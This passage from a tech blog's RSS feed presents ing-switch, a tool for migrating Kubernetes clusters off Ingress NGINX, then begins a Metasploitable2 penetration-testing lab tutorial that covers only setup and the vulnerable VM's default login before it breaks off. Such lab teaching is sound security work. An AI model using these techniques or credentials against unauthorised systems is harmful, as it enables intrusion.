<li><p>My own testing on DGX Spark — 19.5 tok/s (Q4_K_M, Ollama), prompt eval 3.51 tok/s</p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[ing-switch: Migrate from Ingress NGINX to Traefik or Gateway API in Minutes, Not Days]]></title><description><![CDATA[If you run Kubernetes, there's a deadline you can't ignore: Ingress NGINX is being deprecated in March 2026. Roughly half of all Kubernetes clusters depend on it. That's a lot of teams who need a migr]]></description><link>https://blog.kubesimplify.com/ing-switch-migrate-from-ingress-nginx-to-traefik-or-gateway-api-in-minutes-not-days</link><guid isPermaLink="true">https://blog.kubesimplify.com/ing-switch-migrate-from-ingress-nginx-to-traefik-or-gateway-api-in-minutes-not-days</guid><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Wed, 25 Feb 2026 17:24:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/5df7c855-f9ff-4859-9415-e2899869e70b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you run Kubernetes, there's a deadline you can't ignore: <strong>Ingress NGINX is being deprecated in March 2026</strong>. Roughly half of all Kubernetes clusters depend on it. That's a lot of teams who need a migration plan — and most of them are going to discover that it's harder than it looks.</p>
<p>The core problem isn't moving from one controller to another. It's that Ingress NGINX is held together by annotations. Hundreds of <code>nginx.ingress.kubernetes.io/*</code> annotations that control everything from TLS redirects to rate limiting to sticky sessions to canary deployments. These annotations have no direct equivalent in a new controller. Some map cleanly. Some map partially, with caveats. Some have no equivalent at all. And the existing tooling (<code>ingress2gateway</code>) only handles basic routing — it doesn't tell you what you're losing or how to compensate.</p>
<p>That's why I built <a href="https://github.com/saiyam1814/ing-switch"><strong>ing-switch</strong></a> — an open-source CLI + visual UI that takes you through the full migration lifecycle: scan → analyze → generate → verify → cutover → cleanup.</p>
<hr />
<h2>What ing-switch does</h2>
<p>The tool has four commands that map to four stages of migration:</p>
<pre><code class="language-bash">ing-switch scan      # detect your controller + list all ingresses
ing-switch analyze   # map every annotation to the target controller
ing-switch migrate   # generate ready-to-apply manifests
ing-switch ui        # open the visual 4-page migration dashboard at :8080
</code></pre>
<p>And it supports two migration targets:</p>
<table style="min-width:50px"><colgroup><col style="min-width:25px"></col><col style="min-width:25px"></col></colgroup><tbody><tr><th><p>Target</p></th><th><p>What's generated</p></th></tr><tr><td><p><strong>Traefik v3</strong></p></td><td><p>Traefik Middleware CRDs + updated Ingress resources (stays on <code>kind: Ingress</code>, no new CRDs to learn)</p></td></tr><tr><td><p><strong>Gateway API (Envoy Gateway)</strong></p></td><td><p>GatewayClass + Gateway + HTTPRoutes + BackendTrafficPolicy + SecurityPolicy</p></td></tr></tbody></table>

<p><strong>Traefik</strong> is the lowest-friction path: you keep <code>kind: Ingress</code>, your team learns almost nothing new, and almost all annotations have a Traefik equivalent. <strong>Gateway API</strong> is the future-proof path: standardized, implementation-agnostic, and where the ecosystem is heading — but it requires more preparation for partial-support annotations.</p>
<hr />
<h2>Annotation coverage: the hard part</h2>
<p>This is the part most migration tools skip. <code>ing-switch</code> maps over 50 <code>nginx.ingress.kubernetes.io/*</code> annotations for both targets. Here's a sample:</p>
<table style="min-width:75px"><colgroup><col style="min-width:25px"></col><col style="min-width:25px"></col><col style="min-width:25px"></col></colgroup><tbody><tr><th><p>Annotation</p></th><th><p>Traefik</p></th><th><p>Gateway API</p></th></tr><tr><td><p><code>ssl-redirect</code></p></td><td><p>✅ RedirectScheme Middleware</p></td><td><p>✅ HTTPRoute RequestRedirect filter</p></td></tr><tr><td><p><code>force-ssl-redirect</code></p></td><td><p>✅ Permanent redirect</p></td><td><p>✅ 301 HTTPRoute redirect</p></td></tr><tr><td><p><code>enable-cors</code> (all 6 fields)</p></td><td><p>✅ Headers Middleware</p></td><td><p>⚠️ Manual ResponseHeaderModifier (no native CORS filter in v1)</p></td></tr><tr><td><p><code>auth-url</code> (ForwardAuth)</p></td><td><p>✅ ForwardAuth Middleware</p></td><td><p>⚠️ SecurityPolicy (Envoy ext-auth)</p></td></tr><tr><td><p><code>limit-rps</code> / <code>limit-rpm</code></p></td><td><p>✅ RateLimit Middleware</p></td><td><p>⚠️ BackendTrafficPolicy (Envoy extension)</p></td></tr><tr><td><p><code>whitelist-source-range</code></p></td><td><p>✅ IPAllowList Middleware</p></td><td><p>⚠️ HTTPRouteMatch source IP (limited)</p></td></tr><tr><td><p><code>affinity: cookie</code> (sticky sessions)</p></td><td><p>✅ Service sticky annotation</p></td><td><p>⚠️ BackendLBPolicy SessionPersistence (v1.1)</p></td></tr><tr><td><p><code>canary</code> + <code>canary-weight</code></p></td><td><p>✅ Weighted service split</p></td><td><p>✅ HTTPRoute weighted backendRefs</p></td></tr><tr><td><p><code>rewrite-target</code></p></td><td><p>✅ ReplacePath/AddPrefix</p></td><td><p>✅ URLRewrite filter</p></td></tr><tr><td><p><code>proxy-read-timeout</code></p></td><td><p>⚠️ ServersTransport CRD</p></td><td><p>⚠️ HTTPRoute spec.rules[].timeouts</p></td></tr><tr><td><p><code>configuration-snippet</code></p></td><td><p>❌ Not supported (security)</p></td><td><p>❌ Not supported</p></td></tr><tr><td><p><code>session-cookie-samesite</code></p></td><td><p>✅ Sticky 
cookie</p></td><td><p>❌ Not in BackendLBPolicy spec</p></td></tr></tbody></table>

<p>The tool shows you exactly which category each annotation falls into: fully supported (just apply the generated YAML), partial (the YAML is generated, but read the note about what's different), or unsupported (manual work required, with guidance on the best alternative).</p>
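<p>One way to picture the three categories is as a lookup table plus a counter. The sketch below is not the tool's code (ing-switch is a Go binary). It copies the Gateway API column of the sample table into a Python dict and tallies a hypothetical ingress, in the spirit of the per-ingress summary the tool prints.</p>
<pre><code class="language-python">from collections import Counter

# Gateway API status per annotation, copied from the sample table above
GATEWAY_API_STATUS = {
    "ssl-redirect": "supported",
    "force-ssl-redirect": "supported",
    "enable-cors": "partial",
    "auth-url": "partial",
    "limit-rps": "partial",
    "limit-rpm": "partial",
    "whitelist-source-range": "partial",
    "affinity": "partial",
    "canary": "supported",
    "rewrite-target": "supported",
    "proxy-read-timeout": "partial",
    "configuration-snippet": "unsupported",
    "session-cookie-samesite": "unsupported",
}

PREFIX = "nginx.ingress.kubernetes.io/"


def summarize(annotations):
    """Count annotations per status; unknown keys count as 'unmapped'."""
    counts = Counter()
    for key in annotations:
        if not key.startswith(PREFIX):
            continue  # not an Ingress NGINX annotation
        name = key[len(PREFIX):]
        counts[GATEWAY_API_STATUS.get(name, "unmapped")] += 1
    return dict(counts)


# Hypothetical ingress annotations, for illustration only
example = {
    PREFIX + "ssl-redirect": "true",
    PREFIX + "limit-rps": "10",
    PREFIX + "configuration-snippet": "...",
}
print(summarize(example))
</code></pre>
<p>For this example the tally is one supported, one partial, and one unsupported annotation, which is the signal that manual work remains before cutover.</p>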
<hr />
<h2>Installation</h2>
<pre><code class="language-bash"># macOS arm64
curl -L https://github.com/saiyam1814/ing-switch/releases/latest/download/ing-switch-darwin-arm64 -o ing-switch
chmod +x ing-switch &amp;&amp; sudo mv ing-switch /usr/local/bin/

# Linux amd64
curl -L https://github.com/saiyam1814/ing-switch/releases/latest/download/ing-switch-linux-amd64 -o ing-switch
chmod +x ing-switch &amp;&amp; sudo mv ing-switch /usr/local/bin/
</code></pre>
<p>Or build from source:</p>
<pre><code class="language-bash">git clone https://github.com/saiyam1814/ing-switch.git
cd ing-switch
make build   # builds React UI then embeds it in the Go binary
./ing-switch --help
</code></pre>
<hr />
<h2>The Dashboard</h2>
<p>The easiest way to understand what <code>ing-switch</code> does is to open the UI:</p>
<pre><code class="language-bash">ing-switch ui   # opens at localhost:8080
</code></pre>
<h3>Page 1: Detect</h3>
<p>The first page scans your cluster and discovers every Ingress resource across all namespaces, identifies the controller type and version, and flags each ingress by complexity.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/9dfd53cb-7cd4-464d-a8e8-d76b06489710.png" alt="" style="display:block;margin:0 auto" />

<p><em>The tool shows a countdown banner — Ingress NGINX retires March 2026 — and lets you scope the scan to a specific namespace or scan everything.</em></p>
<p>After clicking <strong>Scan Cluster</strong>, the tool connects to your cluster via kubeconfig and enumerates every <code>networking.k8s.io/v1 Ingress</code> object. In my test cluster (a vcluster running 11 production-realistic ingresses), the sidebar updated immediately to show "11 ingresses · retiring · ingress-nginx":</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/adf1f056-5f49-4bbb-a693-4aba846ef71e.png" alt="" style="display:block;margin:0 auto" />

<p><em>The sidebar shows your cluster name, ingress count, and controller status. "Retiring" badge means the detected controller is Ingress NGINX.</em></p>
<h3>Page 2: Analyze</h3>
<p>The Analyze page is where you decide your migration target. You pick between <strong>Traefik v3</strong> (labeled "Lowest friction") or <strong>Gateway API via Envoy Gateway</strong> (labeled "Future-proof standard"), then click <strong>Analyze Compatibility</strong>.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/6cccda7e-dbb3-4d9f-8863-36076eb7b83b.png" alt="" style="display:block;margin:0 auto" />

<p>The engine runs through every annotation on every ingress and produces a per-ingress compatibility matrix. Each annotation gets a status badge:</p>
<ul>
<li><p><strong>Green (supported)</strong> — the generated YAML covers this fully; just apply it</p>
</li>
<li><p><strong>Yellow (partial)</strong> — the feature works but with limitations; the note explains exactly what's different</p>
</li>
<li><p><strong>Red (unsupported)</strong> — no direct equivalent exists; the tool explains the best available workaround</p>
</li>
</ul>
<p>This is the output that replaces weeks of reading changelogs and GitHub issues.</p>
<h3>Page 3: Migrate</h3>
<p>The Migrate page generates the complete output directory of Kubernetes manifests. Click <strong>Generate Migration Files</strong> and the tool writes every file needed for a zero-downtime cutover.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/b5656123-e68e-41d3-83e7-8a13885eb832.png" alt="" style="display:block;margin:0 auto" />

<p><em>The checklist walks you through every step in order, so you can't accidentally skip a dependency (like applying GatewayClass before HTTPRoutes).</em></p>
<p>After generation, each step gains <strong>View File</strong>, <strong>Dry-run</strong>, and <strong>Apply</strong> buttons:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/e8f69606-1790-4d40-8a59-3bb3701a686f.png" alt="" style="display:block;margin:0 auto" />

<p><em>The tool generated 27 migration files for Traefik across 11 ingresses. Each checklist item links to the file it creates, and you can preview the YAML before applying.</em></p>
<p>The <strong>Gaps tab</strong> gives you the executive summary — which ingresses are fully compatible, which have auto-generated workarounds, and which need manual review:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/2477c587-a5c8-463a-a2ca-2b0e91e29e99.png" alt="" style="display:block;margin:0 auto" />

<p><em>"Needs Review" ingresses are listed with the specific annotations that require manual attention, so you know exactly what work remains before cutover.</em></p>
<h3>Page 4: Validate</h3>
<p>After applying the generated manifests, the Validate page gives you a structured checklist of post-migration checks and lets you run live validation against the cluster.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/85281d50-0a67-4c7e-abcd-0c7b127af988.png" alt="" style="display:block;margin:0 auto" />

<p><em>The checklist covers TLS verification, auth testing, rate limit validation, canary routing verification, and a 24-hour monitoring window before removing NGINX.</em></p>
<hr />
<h2>The CLI: same power, no browser</h2>
<p>Everything the UI does is also available as CLI commands, which makes it scriptable and CI-friendly:</p>
<pre><code class="language-bash"># Scan your cluster
$ ing-switch scan
Cluster: production-cluster
Controller: ingress-nginx v1.9.4 (namespace: ingress-nginx)

NAMESPACE    NAME              HOSTS                     ANNOTATIONS  TLS
ecommerce    ecommerce-shop    shop.example.com          13           yes
security     payment-api       payments.example.com      6            yes
messaging    realtime-chat     chat.example.com          2            yes
...
11 ingresses found across 6 namespaces

# Analyze annotation compatibility for Gateway API
$ ing-switch analyze --target gateway-api
INGRESS                       SUPPORTED   PARTIAL   UNSUPPORTED
ecommerce/ecommerce-shop      6           5         2
security/payment-api          3           2         1
...

# Generate all migration manifests
$ ing-switch migrate --target traefik --output-dir ./migration
Generated 27 files across 11 ingresses

migration/
├── 00-migration-report.md      # Full annotation analysis
├── 01-install-traefik/         # Helm install script + values.yaml
├── 02-middlewares/             # Traefik Middleware CRDs
├── 03-ingresses/               # Updated Ingress resources
├── 04-verify.sh                # Test script per hostname
├── 05-dns-migration.md         # DNS cutover guide
└── 06-cleanup/                 # Remove NGINX after cutover
</code></pre>
<hr />
<h2>How it handles the tricky cases</h2>
<p>Three annotation scenarios trip up almost every migration, and <code>ing-switch</code> handles all of them:</p>
<h3>HTTP→HTTPS redirect</h3>
<p>The naive approach — putting both a RequestRedirect filter and a backend rule in the same HTTPRoute — causes a redirect loop where HTTPS traffic gets redirected back to HTTPS. <code>ing-switch</code> generates <strong>two separate HTTPRoutes</strong> using Gateway API <code>sectionName</code> to attach each route to the correct listener:</p>
<pre><code class="language-yaml"># &lt;name&gt;-redirect: attached to HTTP listener only (sectionName: http)
# Returns 301/302 for all incoming HTTP requests

# &lt;name&gt;: attached to HTTPS listener (sectionName: https-0)
# Routes HTTPS traffic to your backends
</code></pre>
<p>This is the correct pattern but requires knowing the Gateway API spec deeply enough to spot the constraint. The tool just does it right.</p>
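<p>To show the shape of that two-route pattern, here is a sketch that builds both HTTPRoutes as Python dicts and prints them as JSON, which <code>kubectl apply -f</code> also accepts. The Gateway name, namespace, hostname, and backend Service are hypothetical, and the files ing-switch actually generates may differ in detail.</p>
<pre><code class="language-python">import json

GATEWAY = "ing-switch-gateway"  # hypothetical Gateway name


def http_route(name, section, rule, hostname="shop.example.com"):
    """Build one HTTPRoute bound to a single Gateway listener."""
    return {
        "apiVersion": "gateway.networking.k8s.io/v1",
        "kind": "HTTPRoute",
        "metadata": {"name": name, "namespace": "ecommerce"},
        "spec": {
            "parentRefs": [{"name": GATEWAY, "sectionName": section}],
            "hostnames": [hostname],
            "rules": [rule],
        },
    }


# Route 1: HTTP listener only, answers every request with a 301 to HTTPS
redirect_rule = {
    "filters": [{
        "type": "RequestRedirect",
        "requestRedirect": {"scheme": "https", "statusCode": 301},
    }]
}
redirect_route = http_route("ecommerce-shop-redirect", "http", redirect_rule)

# Route 2: HTTPS listener only, forwards to the backend (assumed Service)
backend_rule = {"backendRefs": [{"name": "shop", "port": 80}]}
backend_route = http_route("ecommerce-shop", "https-0", backend_rule)

print(json.dumps([redirect_route, backend_route], indent=2))
</code></pre>
<p>The redirect route carries no <code>backendRefs</code> and the backend route carries no redirect filter, so HTTPS traffic never meets the redirect rule.</p>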
<h3>Regex paths</h3>
<p>NGINX annotations like <code>use-regex: "true"</code> and paths like <code>/app(/|$)(.*)</code> are common. Gateway API's <code>PathPrefix</code> type rejects regex characters. <code>ing-switch</code> auto-detects paths containing <code>(</code>, <code>)</code>, <code>|</code>, <code>[</code>, <code>]</code> and switches them to <code>PathMatch.RegularExpression</code> type — even when the <code>use-regex</code> annotation is absent.</p>
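<p>The detection rule described above is small enough to sketch in a few lines. This is an illustration of the idea in Python, not the tool's Go implementation, and it simplifies by treating every non-regex path as a prefix match.</p>
<pre><code class="language-python"># Characters that, per the paragraph above, mark a path as a regex
REGEX_CHARS = set("()|[]")


def path_match_type(path, use_regex=False):
    """Pick a Gateway API path match type for an Ingress NGINX path."""
    if use_regex or any(char in REGEX_CHARS for char in path):
        return "RegularExpression"
    return "PathPrefix"


def http_route_match(path, use_regex=False):
    """Build the matches[] entry for an HTTPRoute rule."""
    return {"path": {"type": path_match_type(path, use_regex), "value": path}}


print(http_route_match("/app(/|$)(.*)"))
print(http_route_match("/api"))
</code></pre>
<p>The first path is classified as <code>RegularExpression</code> even though no <code>use-regex</code> flag was passed, while <code>/api</code> stays a <code>PathPrefix</code> match.</p>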
<h3>Timeout constraints</h3>
<p><code>proxy-read-timeout: 300</code> and <code>proxy-connect-timeout: 5</code> look straightforward to map. But Gateway API enforces <code>backendRequest ≤ request</code>, and mapping read→backendRequest (300s) and connect→request (5s) would violate that constraint. <code>ing-switch</code> maps only <code>proxy-read-timeout → backendRequest</code> and intentionally omits <code>proxy-connect-timeout</code>, with a note explaining why.</p>
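<p>The constraint is easy to check by hand. The sketch below compares the tempting mapping with the one described above. The function names are mine and purely illustrative, and the check only understands whole-second values such as <code>300s</code>.</p>
<pre><code class="language-python">PREFIX = "nginx.ingress.kubernetes.io/"
READ = PREFIX + "proxy-read-timeout"
CONNECT = PREFIX + "proxy-connect-timeout"


def satisfies_constraint(timeouts):
    """Gateway API rule: backendRequest must not exceed request."""
    if "request" not in timeouts or "backendRequest" not in timeouts:
        return True
    request = int(timeouts["request"].rstrip("s"))
    backend = int(timeouts["backendRequest"].rstrip("s"))
    return min(backend, request) == backend


def naive_mapping(annotations):
    """The tempting mapping: read to backendRequest, connect to request."""
    return {
        "backendRequest": annotations[READ] + "s",
        "request": annotations[CONNECT] + "s",
    }


def safe_mapping(annotations):
    """Map only proxy-read-timeout and report what was left out."""
    timeouts, notes = {}, []
    if READ in annotations:
        timeouts["backendRequest"] = annotations[READ] + "s"
    if CONNECT in annotations:
        notes.append("proxy-connect-timeout omitted: would break the constraint")
    return timeouts, notes


annotations = {READ: "300", CONNECT: "5"}
print(satisfies_constraint(naive_mapping(annotations)))    # False
print(satisfies_constraint(safe_mapping(annotations)[0]))  # True
</code></pre>
<p>With a 300-second read timeout and a 5-second connect timeout, the naive mapping produces an HTTPRoute that violates the rule, while the read-only mapping passes and leaves a note for the reviewer.</p>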
<hr />
<h2>Generated output: Gateway API example</h2>
<p>For a single ingress with SSL redirect, session affinity, and rate limiting, the Gateway API migration generates:</p>
<pre><code class="language-plaintext">migration/
├── 00-migration-report.md
├── 01-install-gateway-api-crds/
│   └── install.sh
├── 02-install-envoy-gateway/
│   ├── helm-install.sh
│   └── values.yaml
├── 03-gateway/
│   ├── gatewayclass.yaml      # GatewayClass (Envoy Gateway)
│   └── gateway.yaml           # Gateway: HTTP + HTTPS listeners
├── 04-httproutes/
│   ├── ecommerce-ecommerce-shop-redirect.yaml   # HTTP→HTTPS (sectionName: http)
│   └── ecommerce-ecommerce-shop.yaml            # HTTPS backend (sectionName: https-0)
├── 05-policies/
│   └── ecommerce-ecommerce-shop-btp.yaml        # BackendTrafficPolicy (rate limit)
├── 06-verify.sh
└── 07-cleanup/
    └── remove-nginx.sh
</code></pre>
<hr />
<h2>Example ingresses</h2>
<p>The repo includes 11 production-realistic NGINX Ingress configurations covering every major annotation category you're likely to have in a real cluster:</p>
<table style="min-width:50px"><colgroup><col style="min-width:25px"></col><col style="min-width:25px"></col></colgroup><tbody><tr><th><p>File</p></th><th><p>Covers</p></th></tr><tr><td><p><code>01-basic-routing.yaml</code></p></td><td><p>Path routing, TLS termination</p></td></tr><tr><td><p><code>02-ssl-tls.yaml</code></p></td><td><p>SSL redirect, HSTS, force-ssl</p></td></tr><tr><td><p><code>03-auth-external.yaml</code></p></td><td><p>External auth (auth-url, auth-response-headers)</p></td></tr><tr><td><p><code>04-session-affinity.yaml</code></p></td><td><p>Sticky cookies (all 8 session-cookie-* fields)</p></td></tr><tr><td><p><code>05-canary.yaml</code></p></td><td><p>Canary by weight, header, cookie</p></td></tr><tr><td><p><code>06-cors.yaml</code></p></td><td><p>Full CORS (all 6 cors-* annotations)</p></td></tr><tr><td><p><code>07-path-rewrite-regex.yaml</code></p></td><td><p>Regex routing, rewrite-target capture groups</p></td></tr><tr><td><p><code>08-rate-limit-ip.yaml</code></p></td><td><p>Rate limiting, IP allowlist/denylist</p></td></tr><tr><td><p><code>09-websocket.yaml</code></p></td><td><p>WebSocket upgrade</p></td></tr><tr><td><p><code>10-grpc.yaml</code></p></td><td><p>gRPC passthrough</p></td></tr><tr><td><p><code>11-full-featured.yaml</code></p></td><td><p>All of the above combined</p></td></tr></tbody></table>

<p>You can apply them to a test cluster and run the full migration against them:</p>
<pre><code class="language-bash">kubectl apply -f examples/
ing-switch migrate --target gateway-api --output-dir ./migration-examples
kubectl apply --dry-run=client -f ./migration-examples/03-gateway/
kubectl apply --dry-run=client -f ./migration-examples/04-httproutes/
</code></pre>
<hr />
<h2>Zero-downtime migration strategy</h2>
<p>The tool is designed around a zero-downtime approach:</p>
<ol>
<li><p><strong>Install the new controller alongside NGINX</strong> — both run simultaneously; DNS still points to NGINX</p>
</li>
<li><p><strong>Apply generated manifests</strong> — Middlewares, HTTPRoutes, Gateway</p>
</li>
<li><p><strong>Verify the new controller</strong> — run the generated verify script (<code>04-verify.sh</code> for Traefik, <code>06-verify.sh</code> for Gateway API) to test each hostname against the new IP</p>
</li>
<li><p><strong>Shift DNS</strong> — update your DNS records to point to the new controller's LoadBalancer IP</p>
</li>
<li><p><strong>Monitor for 24 hours</strong> — watch for 5xx errors, auth failures, session issues</p>
</li>
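<li><p><strong>Remove NGINX</strong> — run the cleanup step from the generated cleanup directory (<code>06-cleanup/</code> for Traefik, <code>07-cleanup/remove-nginx.sh</code> for Gateway API)</p>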
</li>
</ol>
<p>The Migrate page's step-by-step checklist mirrors this order and locks steps until their dependencies are checked off.</p>
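<p>Step 3 is the one worth understanding in detail, because it tests the new controller before DNS changes. A minimal sketch of the idea, assuming plain HTTP and a placeholder IP: send the request to the new LoadBalancer IP while presenting the real hostname in the <code>Host</code> header. This is not the generated verify script, only an illustration of what such a check does.</p>
<pre><code class="language-python">import urllib.error
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects, so a 301 to HTTPS is reported as-is."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def build_check(new_ip, hostname, path="/"):
    """Request aimed at the new controller IP, carrying the real Host header."""
    return urllib.request.Request(
        f"http://{new_ip}{path}", headers={"Host": hostname}
    )


def check(new_ip, hostname):
    """Return the HTTP status the new controller gives for this hostname."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(build_check(new_ip, hostname), timeout=5) as response:
            return response.status
    except urllib.error.HTTPError as error:
        return error.code  # 3xx/4xx/5xx answers still tell us something
</code></pre>
<p>For example, <code>check("203.0.113.10", "shop.example.com")</code> (a documentation-range IP, replace it with your own) would return 301 if the HTTP listener redirects to HTTPS as intended. Redirects are deliberately not followed, since following them would resolve the hostname through DNS and land back on NGINX.</p>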
<hr />
<h2>Try it</h2>
<pre><code class="language-bash"># Install
curl -L https://github.com/saiyam1814/ing-switch/releases/latest/download/ing-switch-darwin-arm64 -o ing-switch
chmod +x ing-switch &amp;&amp; sudo mv ing-switch /usr/local/bin/

# Point at your cluster
export KUBECONFIG=~/.kube/config

# Open the visual UI
ing-switch ui
</code></pre>
<p>The source, examples, and annotation mapping database are at <a href="https://github.com/saiyam1814/ing-switch"><strong>github.com/saiyam1814/ing-switch</strong></a>.</p>
<p>The annotation mapping database lives in <code>pkg/analyzer/compatibility.go</code> (status + target resource per annotation) and <code>pkg/server/guides.go</code> (human-readable what/fix/example per annotation). PRs for additional annotation mappings are welcome.</p>
<hr />
<p><em>March 2026 is closer than it looks. The tools are ready.</em></p>
]]></content:encoded></item><item><title><![CDATA[Exploiting Metasploitable2 Using msfconsole (Kali Linux Lab)]]></title><description><![CDATA[Exploiting Metasploitable2 Using msfconsole (Kali Linux Lab)
Introduction
msfconsole is the heart of the Metasploit Framework and one of the most powerful tools used by penetration testers to identify, exploit, and validate security vulnerabilities. ...]]></description><link>https://blog.kubesimplify.com/exploiting-metasploitable2-using-msfconsole-kali-linux-lab</link><guid isPermaLink="true">https://blog.kubesimplify.com/exploiting-metasploitable2-using-msfconsole-kali-linux-lab</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[Msfconsole]]></category><category><![CDATA[metasploitable2]]></category><category><![CDATA[Web Exploitation]]></category><dc:creator><![CDATA[Ankit Kumar]]></dc:creator><pubDate>Sat, 17 Jan 2026 16:15:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1768665637972/12f25f19-87fa-4976-a328-5182fbed203e.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-exploiting-metasploitable2-using-msfconsole-kali-linux-lab"><strong>Exploiting Metasploitable2 Using</strong> <code>msfconsole</code> (Kali Linux Lab)</h2>
<h2 id="heading-introduction"><strong>Introduction</strong></h2>
<p><code>msfconsole</code> is the heart of the <strong>Metasploit Framework</strong> and one of the most powerful tools used by penetration testers to <strong>identify, exploit, and validate security vulnerabilities</strong>. In real-world security assessments as well as Capture The Flag (CTF) challenges, <code>msfconsole</code> is often used to automate and streamline exploitation workflows.</p>
<p>In this blog, we will explore how to use <code>msfconsole</code> from <strong>Kali Linux</strong> to exploit an intentionally vulnerable machine, <strong>Metasploitable2</strong>, in a safe and controlled lab environment.</p>
<p>Both machines are hosted on <strong>Oracle VM VirtualBox</strong> and configured on the same internal network. This setup allows us to simulate real attack scenarios while maintaining proper ethical boundaries.</p>
<p>The goal of this blog is to:</p>
<ul>
<li><p>Understand what <code>msfconsole</code> is and why it is used</p>
</li>
<li><p>Learn how attackers interact with vulnerable services using Metasploit</p>
</li>
<li><p>Gain hands-on experience with a realistic exploitation lab</p>
</li>
</ul>
<blockquote>
<p><strong><em>Note:</em></strong> <em>All demonstrations in this blog are performed on machines owned by us or intentionally designed to be vulnerable. Never use these techniques on unauthorized systems.</em></p>
</blockquote>
<p>In the next section, we will briefly look at the lab architecture before launching <code>msfconsole</code> and beginning the exploitation process.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*F-1r_D3nLsU0NgJxadHHuA.png" alt /></p>
<h2 id="heading-setting-up-msfconsole-and-metasploitable2-step-by-step-lab-setup"><strong>Setting Up</strong> <code>msfconsole</code> and Metasploitable2 (Step-by-Step Lab Setup)</h2>
<p>Before launching any exploitation using <code>msfconsole</code>, we must ensure that <strong>both the attacker and the vulnerable target are properly set up and reachable</strong>. This section covers the <strong>complete setup process</strong> for <code>msfconsole</code> on Kali Linux and the Metasploitable2 vulnerable server.</p>
<h2 id="heading-1-setting-up-the-attacker-machine-kali-linux"><strong>1. Setting Up the Attacker Machine (Kali Linux)</strong></h2>
<h2 id="heading-why-kali-linux"><strong>Why Kali Linux?</strong></h2>
<p><strong>Kali Linux</strong> comes pre-installed with hundreds of penetration testing tools, including the <strong>Metasploit Framework</strong>.</p>
<h2 id="heading-verify-metasploit-installation"><strong>Verify Metasploit Installation</strong></h2>
<p>On Kali, Metasploit is installed by default. To verify:</p>
<pre><code class="lang-plaintext">msfconsole --version
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1250/1*yYXvf1oFpRK4eLEfj9mdWA.png" alt /></p>
<p>If Metasploit is installed correctly, you will see version details.</p>
<hr />
<h2 id="heading-start-msfconsole"><strong>Start</strong> <code>msfconsole</code></h2>
<pre><code class="lang-plaintext">msfconsole
</code></pre>
<p>On first launch, Metasploit may:</p>
<ul>
<li><p>Initialize its database</p>
</li>
<li><p>Create required configuration files</p>
</li>
</ul>
<p>You should now see the familiar <code>msf6 &gt;</code> prompt.</p>
<p>This confirms that <code>msfconsole</code> <strong>is ready to use</strong>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*2R285OLEWTQFtpGtItnnVQ.png" alt /></p>
<hr />
<h2 id="heading-2-setting-up-the-target-machine-metasploitable2"><strong>2. Setting Up the Target Machine (Metasploitable2)</strong></h2>
<h2 id="heading-what-is-metasploitable2"><strong>What is Metasploitable2?</strong></h2>
<p><strong>Metasploitable2</strong> is a deliberately vulnerable Linux machine created for practicing penetration testing techniques.</p>
<h2 id="heading-start-metasploitable2-vm"><strong>Start Metasploitable2 VM</strong></h2>
<ul>
<li><p>Launch Metasploitable2 in <strong>Oracle VM VirtualBox</strong></p>
</li>
<li><p>Wait until it boots to the login screen</p>
</li>
</ul>
<h2 id="heading-default-credentials"><strong>Default Credentials</strong></h2>
<pre><code class="lang-plaintext">Username: msfadmin
Password: msfadmin
</code></pre>
<p>Log in with these credentials to access the system.</p>
<h2 id="heading-check-ip-address-of-metasploitable2"><strong>Check IP Address of Metasploitable2</strong></h2>
<pre><code class="lang-plaintext">ifconfig
</code></pre>
<p>Example output:</p>
<pre><code class="lang-plaintext">inet addr:192.168.56.101
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*orC8wVFlmX8C9S_saVqHyQ.png" alt /></p>
<p><strong>Note this IP address</strong>, as it will be used as the target (<code>RHOSTS</code>) inside <code>msfconsole</code>.</p>
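<p>If you save the <code>ifconfig</code> output to a file, a short Python sketch like the one below can pull the address out for you. It assumes the older <code>inet addr:</code> format shown above; the sample text and function names are hypothetical stand-ins, and only the <code>192.168.56.101</code> value comes from this lab.</p>
<pre><code class="lang-python">import re

# Hypothetical sample in the "inet addr:" format shown above.
SAMPLE_IFCONFIG = """eth0      Link encap:Ethernet
          inet addr:192.168.56.101  Bcast:192.168.56.255  Mask:255.255.255.0
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
"""


def find_ipv4_addresses(ifconfig_text):
    """Return every IPv4 address that follows 'inet addr:' in the text."""
    return re.findall(r"inet addr:(\d{1,3}(?:\.\d{1,3}){3})", ifconfig_text)


def pick_target_ip(ifconfig_text):
    """Return the first non-loopback address, or None if there is none."""
    for address in find_ipv4_addresses(ifconfig_text):
        if not address.startswith("127."):
            return address
    return None


print(pick_target_ip(SAMPLE_IFCONFIG))
</code></pre>
<p>The loopback address is skipped on purpose, because <code>127.0.0.1</code> is never a useful value for <code>RHOSTS</code>.</p>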
<h2 id="heading-3-ensure-both-machines-are-on-the-same-network"><strong>3. Ensure Both Machines Are on the Same Network</strong></h2>
<p>Both VMs must be configured with:</p>
<ul>
<li><p><strong>Network Adapter:</strong> Host-only Adapter</p>
</li>
<li><p><strong>Name:</strong> VirtualBox Host-Only Ethernet Adapter</p>
